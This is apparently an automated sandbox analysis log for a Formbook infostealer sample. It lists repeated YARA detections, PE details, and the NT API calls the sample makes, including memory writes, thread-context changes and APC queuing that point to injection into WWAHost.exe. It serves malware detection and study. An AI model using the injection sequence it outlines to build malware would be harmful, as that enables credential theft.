          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DN_467842234567.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004063540_2_00406354
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004048020_2_00404802
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00406B2B0_2_00406B2B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915CF10_2_72915CF1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915CE20_2_72915CE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C8F41_2_0041C8F4
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B8B31_2_0041B8B3
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C2661_2_0041C266
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004012FB1_2_004012FB
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00408C6B1_2_00408C6B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00408C701_2_00408C70
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C4311_2_0041C431
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A01_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B0901_2_00B9B090
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C528EC1_2_00C528EC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C520A81_2_00C520A8
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C410021_2_00C41002
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5E8241_2_00C5E824
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA41201_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8F9001_2_00B8F900
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C522AE1_2_00C522AE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBEBB01_2_00BBEBB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4DBD21_2_00C4DBD2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C52B281_2_00C52B28
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4D4661_2_00C4D466
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9841F1_2_00B9841F
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C525DD1_2_00C525DD
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB25811_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E01_2_00B9D5E0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C51D551_2_00C51D55
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B80D201_2_00B80D20
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C52D071_2_00C52D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387EBB07_2_0387EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03866E307_2_03866E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038725817_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E07_2_0385D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384F9007_2_0384F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03840D207_2_03840D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038641207_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03911D557_2_03911D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B0907_2_0385B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_039010027_2_03901002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385841F7_2_0385841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C8F47_2_0057C8F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B8B37_2_0057B8B3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C2667_2_0057C266
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00568C707_2_00568C70
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00568C6B7_2_00568C6B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C4317_2_0057C431
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00562D907_2_00562D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00562FB07_2_00562FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0384B150 appears 32 times
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: String function: 00B8B150 appears 34 times
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418700 NtClose,1_2_00418700
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004185CA NtCreateFile,1_2_004185CA
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418622 NtCreateFile,1_2_00418622
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004186FA NtClose,1_2_004186FA
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,1_2_004187AA
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00BC98F0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00BC9860
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9840 NtDelayExecution,LdrInitializeThunk,1_2_00BC9840
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC99A0 NtCreateSection,LdrInitializeThunk,1_2_00BC99A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00BC9910
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A20 NtResumeThread,LdrInitializeThunk,1_2_00BC9A20
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00BC9A00
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A50 NtCreateFile,LdrInitializeThunk,1_2_00BC9A50
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC95D0 NtClose,LdrInitializeThunk,1_2_00BC95D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9540 NtReadFile,LdrInitializeThunk,1_2_00BC9540
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00BC96E0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00BC9660
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00BC97A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00BC9780
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00BC9FE0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00BC9710
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC98A0 NtWriteVirtualMemory,1_2_00BC98A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9820 NtEnumerateKey,1_2_00BC9820
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCB040 NtSuspendThread,1_2_00BCB040
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC99D0 NtCreateProcessEx,1_2_00BC99D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9950 NtQueueApcThread,1_2_00BC9950
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A80 NtOpenDirectoryObject,1_2_00BC9A80
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A10 NtQuerySection,1_2_00BC9A10
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCA3B0 NtGetContextThread,1_2_00BCA3B0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9B00 NtSetValueKey,1_2_00BC9B00
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC95F0 NtQueryInformationFile,1_2_00BC95F0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCAD30 NtSetContextThread,1_2_00BCAD30
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9520 NtWaitForSingleObject,1_2_00BC9520
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9560 NtWriteFile,1_2_00BC9560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889780 NtMapViewOfSection,LdrInitializeThunk,7_2_03889780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889FE0 NtCreateMutant,LdrInitializeThunk,7_2_03889FE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889710 NtQueryInformationToken,LdrInitializeThunk,7_2_03889710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038896D0 NtCreateKey,LdrInitializeThunk,7_2_038896D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_038896E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889650 NtQueryValueKey,LdrInitializeThunk,7_2_03889650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A50 NtCreateFile,LdrInitializeThunk,7_2_03889A50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03889660
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038899A0 NtCreateSection,LdrInitializeThunk,7_2_038899A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038895D0 NtClose,LdrInitializeThunk,7_2_038895D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_03889910
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889540 NtReadFile,LdrInitializeThunk,7_2_03889540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889840 NtDelayExecution,LdrInitializeThunk,7_2_03889840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889860 NtQuerySystemInformation,LdrInitializeThunk,7_2_03889860
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038897A0 NtUnmapViewOfSection,7_2_038897A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A3B0 NtGetContextThread,7_2_0388A3B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889B00 NtSetValueKey,7_2_03889B00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A710 NtOpenProcessToken,7_2_0388A710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889730 NtQueryVirtualMemory,7_2_03889730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889760 NtOpenProcess,7_2_03889760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889770 NtSetInformationFile,7_2_03889770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A770 NtOpenThread,7_2_0388A770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A80 NtOpenDirectoryObject,7_2_03889A80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A00 NtProtectVirtualMemory,7_2_03889A00
